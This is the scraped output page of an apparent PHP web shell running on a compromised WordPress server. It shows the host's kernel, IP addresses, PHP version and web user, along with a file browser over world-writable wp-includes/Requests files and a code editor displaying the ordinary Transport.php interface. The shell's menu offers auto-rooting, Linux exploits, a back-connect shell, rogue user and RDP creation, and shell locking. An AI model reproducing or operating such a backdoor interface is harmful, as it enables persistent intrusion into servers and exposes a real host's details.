Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.14.219.203
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ru-website /
wp-includes /
Requests /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxrwxrwx
Cookie
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
Proxy
[ DIR ]
drwxrwxrwx
Response
[ DIR ]
drwxrwxrwx
Transport
[ DIR ]
drwxrwxrwx
Utility
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
Auth.php
810
B
-rwxrwxrwx
Cookie.php
12.73
KB
-rwxrwxrwx
Exception.php
1
KB
-rwxrwxrwx
Hooker.php
709
B
-rwxrwxrwx
Hooks.php
1.37
KB
-rwxrwxrwx
IDNAEncoder.php
11.28
KB
-rwxrwxrwx
IPv6.php
4.89
KB
-rwxrwxrwx
IRI.php
27.88
KB
-rwxrwxrwx
Proxy.php
813
B
-rwxrwxrwx
Response.php
2.46
KB
-rwxrwxrwx
SSL.php
3.72
KB
-rwxrwxrwx
Session.php
7
KB
-rwxrwxrwx
Transport.php
1.19
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Transport.php
<?php /** * Base HTTP transport * * @package Requests * @subpackage Transport */ /** * Base HTTP transport * * @package Requests * @subpackage Transport */ interface Requests_Transport { /** * Perform a request * * @param string $url URL to request * @param array $headers Associative array of request headers * @param string|array $data Data to send either as the POST body, or as parameters in the URL for a GET/HEAD * @param array $options Request options, see {@see Requests::response()} for documentation * @return string Raw HTTP result */ public function request($url, $headers = array(), $data = array(), $options = array()); /** * Send multiple requests simultaneously * * @param array $requests Request data (array of 'url', 'headers', 'data', 'options') as per {@see Requests_Transport::request} * @param array $options Global options, see {@see Requests::response()} for documentation * @return array Array of Requests_Response objects (may contain Requests_Exception or string responses as well) */ public function request_multiple($requests, $options); /** * Self-test whether the transport can be used * @return bool */ public static function test(); }
Close